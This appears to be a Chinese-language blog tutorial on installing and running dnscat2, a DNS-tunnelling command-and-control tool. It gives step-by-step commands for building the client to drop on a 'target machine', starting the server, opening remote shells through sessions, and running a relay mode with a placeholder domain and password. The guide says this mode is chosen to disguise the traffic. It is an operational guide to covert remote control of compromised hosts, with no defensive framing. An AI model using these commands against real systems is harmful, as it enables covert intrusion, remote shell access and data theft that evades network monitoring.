dnscat2是一个DNS隧道工具，通过DNS协议创建加密的命令和控制通道，它的一大特色就是服务端会有一个命令行控制台，所有的指令都可以在该控制台内完成。包括:文件上传、下载、反弹Shell

目录

Dnscat2安装

解决bundle instal1特别慢问题

客户端编译（在同一个服务端vps下编译好dnscat，上传目标机搞）

dnscat下载下来上传目标机 

 DNS直连模式

开启服务端

服务端会显示连接的命令，只需带上vps的ip进行执行即可

基本命令使用 

​DNS直连流量展示

DNS中级模式 （带上挂中载的命令，其余和直连一样，不过流量更好混淆）

服务端启动

客户端启动

可能出现的问题

53端口被占用，csdn有相关文章讲述

---

Dnscat2安装

apt install ruby ruby-dev git make g++ ruby-bundler
gem install bundlergit clone https://gitee.com/yijingsec/dnscat2.git
cd dnscat2/server
bundle install

解决bundle instal1特别慢问题

vim Gemfile   #打开这个配置文件
source 'https://gems.ruby-china.com'  #修改配置

客户端编译（在同一个服务端vps下编译好dnscat，上传目标机搞）

git clone https://gitee.com/yijingsec/dnscat2.git
cd dnscat2/client/
make

dnscat下载下来上传目标机 

 DNS直连模式

开启服务端

ruby ./dnscat2.rb

 服务端会显示连接的命令，只需带上vps的ip进行执行即可

基本命令使用 

获取shell：windows  #相当于msf的sessions
session -i 1
shell
session -i 2
back  #放后台

 DNS直连流量展示

DNS中级模式 （带上挂中载的命令，其余和直连一样，不过流量更好混淆）

服务端启动

ruby ./dnscat2.rb nc1.peiqi.fake.top --secret=crazy  #--secret=crazy密码设置，nc1.peiqi.fake.top挂的中继

客户端启动

dnscat也是和直连模式一样获取的

./dnscat --secret=crazy nc1.peiqi.fake.top

可能出现的问题

53端口被占用，csdn有相关文章讲述